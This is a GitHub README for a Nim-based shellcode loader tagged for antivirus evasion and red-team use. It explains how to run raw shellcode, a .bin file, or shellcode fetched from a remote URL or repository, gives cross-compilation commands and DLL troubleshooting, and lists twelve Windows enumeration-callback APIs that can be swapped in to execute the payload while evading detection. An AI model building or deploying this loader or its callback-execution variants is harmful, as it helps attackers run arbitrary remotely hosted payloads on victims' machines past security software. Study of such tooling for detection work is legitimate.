Topics: nim, AV evasion, red team, shellcode, bypass, apt, bypass-av.

sh3d0ww01f/nim_shellloader

nim_shellloader

Details:

Usage

loader.exe payload.bin
loader.exe (yourshellcode)
loader.exe (http://xxxx/xxx)

Pass your URL, .bin file name, or shellcode directly as the argument: whatever follows loader.exe is taken as the raw shellcode, the name of a .bin file, or a URL.

① Use shellcode directly:

② Use a .bin file: the shellcode is loaded from the .bin file.

③ Load shellcode hosted on your own server (remote load).

Besides, you can also put the shellcode in a repository (gitee, github, etc.) and have the loader fetch it from there.

Notice: you must remove the '\x' prefixes from your shellcode.

Detection results

Compile

Step 1: install the required libraries

nimble install https://github.com/khchen/winim
nimble install https://github.com/status-im/nim-stew

Step 2: generate the exe

nim c --cpu:i386 -d:mingw -d:ssl --opt:size shellcode_loader.nim

Advice

Compiling on Windows is prone to hard-to-diagnose problems. In my opinion you'd better compile it on Linux; Debian 11 works for cross-compiling, but remember to install mingw.

If it fails with: could not load:(libcrypto-1_1|libeay32).dll

I consider this to be a platform mismatch: the command built for i386 (32-bit x86), which did not match the target's platform. Replace "i386" with "amd64", like the following:

nim c --cpu:amd64 -d:mingw -d:ssl --opt:size shellcode_loader.nim

If you compile on Windows, you don't need to add -d:mingw.

You may run into problems when running the loader. If shellcode_loader fails with:

could not load: (libcrypto-1_1-x64|libeay64).dll

that means you may need to supply these DLLs:

libcrypto-1_1-x64.dll

libenchant.dll

libpq.dll

libsasl.dll

libsodium.dll

libssh2.dll

libssl-1_1-x64.dll

You can find them in the folder of a Windows PHP installation, or download them from the Internet.

The EnumSystemGeoID callback call in the source can be replaced with any of the following equivalent functions:

# Callback execution
    EnumSystemGeoID(GEOCLASS_NATION, 0, cast[GEO_ENUMPROC](rPtr)) #①
    EnumChildWindows(cast[HWND](nil), cast[WNDENUMPROC](rPtr), cast[LPARAM](nil)) #②
    EnumDateFormatsA(cast[DATEFMT_ENUMPROCA](rPtr), LOCALE_SYSTEM_DEFAULT, cast[DWORD](0)) #③
    EnumDesktopsW(GetProcessWindowStation(), cast[DESKTOPENUMPROCW](rPtr), cast[LPARAM](nil)) #④
    EnumDesktopWindows(GetThreadDesktop(GetCurrentThreadId()), cast[WNDENUMPROC](rPtr), cast[LPARAM](nil)) #⑤
    EnumSystemCodePagesA(cast[CODEPAGE_ENUMPROCA](rPtr), 0) #⑥
    EnumSystemCodePagesW(cast[CODEPAGE_ENUMPROCW](rPtr), CP_INSTALLED) #⑦
    EnumSystemLanguageGroupsA(cast[LANGUAGEGROUP_ENUMPROCA](rPtr), LGRPID_SUPPORTED, 0) #⑧
    EnumSystemLocalesA(cast[LOCALE_ENUMPROCA](rPtr), nil) #⑨
    EnumThreadWindows(0, cast[WNDENUMPROC](rPtr), 0) #⑩
    EnumUILanguagesA(cast[UILANGUAGE_ENUMPROCA](rPtr), MUI_LANGUAGE_ID, 0) #⑪
    EnumWindows(cast[WNDENUMPROC](rPtr), cast[LPARAM](nil)) #⑫